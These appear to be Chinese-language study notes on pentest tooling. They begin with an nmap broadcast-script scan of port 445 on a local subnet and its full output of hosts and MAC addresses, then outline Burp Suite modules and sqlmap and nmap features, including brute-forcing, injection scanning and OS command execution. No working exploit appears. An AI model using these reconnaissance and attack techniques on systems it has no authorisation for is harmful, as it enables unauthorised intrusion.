探测局域网内更多开启服务的情况
nmap -n -p 445 --script=broadcast 192.168.1.6
┌──(root㉿kali)-[/usr/share/nmap/scripts]
└─# nmap -n -p 445 --script=broadcast 192.168.1.6/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 21:30 CST
Pre-scan script results:
|_eap-info: please specify an interface with -e
| broadcast-listener:
| ether
| ARP Request
| sender ip sender mac target ip
|_ 192.168.1.1 28:23:f5:ae:c3:b0 192.168.1.6
| broadcast-dhcp-discover:
| Response 1 of 1:
| Interface: eth0
| IP Offered: 192.168.1.3
| Server Identifier: 192.168.1.1
| Subnet Mask: 255.255.255.0
| Router: 192.168.1.1
| Domain Name Server: 192.168.1.1
|_ NetBIOS Name Server: 192.168.1.1, 192.168.1.1
| ipv6-multicast-mld-list:
| fe80::9015:afff:febe:84a5:
| device: eth0
| mac: 92:15:af:be:84:a5
| multicast_ips:
| ff02::1:ff00:bff8 (Solicited-Node Address)
| ff02::1:ff00:bff8 (Solicited-Node Address)
| ff02::1:ff00:bff8 (Solicited-Node Address)
| ff02::1:ffbe:84a5 (NDP Solicited-node)
| ff02::1:ffbe:84a5 (NDP Solicited-node)
| ff02::1:ffbe:84a5 (NDP Solicited-node)
|_ ff02::1:ff00:bff8 (Solicited-Node Address)
| broadcast-upnp-info:
| 239.255.255.250
| Server: Linux/3.18.24_hi3798mv310, UPnP/1.0, Portable SDK for UPnP devices/1.6.19
|_ Location: http://192.168.1.7:25826/description.xml
| targets-ipv6-multicast-mld:
| IP: fe80::9015:afff:febe:84a5 MAC: 92:15:af:be:84:a5 IFACE: eth0
|
|_ Use --script-args=newtargets to add the results as targets
| broadcast-ping:
| IP: 192.168.1.1 MAC: 28:23:f5:ae:c3:b0
|_ Use --script-args=newtargets to add the results as targets
| targets-ipv6-multicast-invalid-dst:
| IP: 2409:8a74:229b:9fb0:2a23:f5ff:feae:c3b0 MAC: 28:23:f5:ae:c3:b0 IFACE: eth0
| IP: fe80::1 MAC: 28:23:f5:ae:c3:b0 IFACE: eth0
|_ Use --script-args=newtargets to add the results as targets
| targets-ipv6-multicast-echo:
| IP: 2409:8a74:229b:9fb0:fcdf:b32f:4b00:bff8 MAC: 92:15:af:be:84:a5 IFACE: eth0
| IP: 2409:8a74:229b:9fb0:2a23:f5ff:feae:c3b0 MAC: 28:23:f5:ae:c3:b0 IFACE: eth0
| IP: fe80::9015:afff:febe:84a5 MAC: 92:15:af:be:84:a5 IFACE: eth0
| IP: fe80::1 MAC: 28:23:f5:ae:c3:b0 IFACE: eth0
|_ Use --script-args=newtargets to add the results as targets
Nmap scan report for 192.168.1.1
Host is up (0.0066s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 28:23:F5:AE:C3:B0 (China Mobile (Hangzhou) Information Technology)
Nmap scan report for 192.168.1.2
Host is up (0.086s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 74:AD:B7:D1:85:8C (China Mobile Group Device)
Nmap scan report for 192.168.1.4
Host is up (0.082s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 92:15:AF:BE:84:A5 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.50s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: E0:19:1D:36:CD:EF (Huawei Technologies)
Nmap scan report for 192.168.1.6
Host is up (0.00010s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 30:C9:AB:48:35:4D (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.1.7
Host is up (0.15s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 44:B2:95:9D:B9:D4 (SichuanAI-LinkTechnologyCo.)
Nmap scan report for 192.168.1.11
Host is up (0.00037s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:A6:58:C1 (VMware)
Nmap scan report for 192.168.1.8
Host is up (0.000079s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap done: 256 IP addresses (8 hosts up) scanned in 57.22 seconds
burp
对比工具(comparer)
-
抓取两个数据包
-
也可以复制或者从文件中读取数据
- 发送到比较工具 comparer
- 选择文字比较或字节比较
- 出现对比框,可以查看 hex 形式的,帮助找到不同
编码(decoder)
- 可以选择 text,hex 两种可以修改,有编码解码和哈希, 支持多种编码解码方式
重发器(repeater)
- 可以从目标,代理,攻击器转发过来
- 可以使用 hex 进行编辑然后重发
- 返回的,可以多种方式查看
intruder 爆破,模糊测试
-
通过抓包转发到这个模块
-
需要测试的参数,添加
-
选择模式
- sniper:单一的 payload,模糊测试
- battering:单一的 payload,把一组 payload 放在所有位置测试
- pitchfork:
- cluster:使用多个 payload,每种 payload 组合都会被试一遍
-
使用状态码,或者时间的返回值排序
proxy
forward,放包
drop,丢弃
target
-
可以选择主动扫描或者被动扫描,主动扫描过程中会发送新的请求 payload 验证漏洞,被动扫描时 bp 不会重新发送请求,在已经存在的请求和应答分析
-
主动扫描:xss,http 头注入,重定向,sql 注入,命令行注入,文件遍历、
-
被动扫描:
-
扫描完成后可以导出报告
- sqlmap
- 探测是否存在 sql 注入
- 需要登录的网站使用 cookie
- 使用数据包,使用 - p 参数指定测试参数
- 读取文件中的 url 批量测试
- 使用 post 提交 --data
- –random-agent, 随机 User-Agent
- –proxy 使用代理连接到 url
- 全部使用默认,不用手动输入 y
- 刷新目标的会话文件,避免 sqlmap 自动缓存机制
- 测试的级别和执行测试的风险
- 设置 sql 注入的技术
- 枚举数据库信息
- 获取信息
- 使用操作系统命令
- 线程和保持连接
- 文件上传和读取
- nmap
- tcp syn 扫描原理(-sS)
- 端口状态
- 直接扫描
- 判断端口是否开放
- 扫描子网 80 端口
- 从文件导入地址或网段
- 对目标地址进行路由跟踪
- 扫描 c 端在线状况
- 目标地址操作系统的指纹识别
- 开放端口对应的服务的版本信息
- 探测防火墙状态
- 脚本使用,脚本 mul
- 鉴权扫描
- 暴力破解攻击
- 扫描常见漏洞
- 应用服务扫描
- 探测局域网内更多开启服务的情况
- burp
- 对比工具(comparer)
- 编码(decoder)
- 重发器(repeater)
- intruder 爆破,模糊测试
- proxy
- target
EOF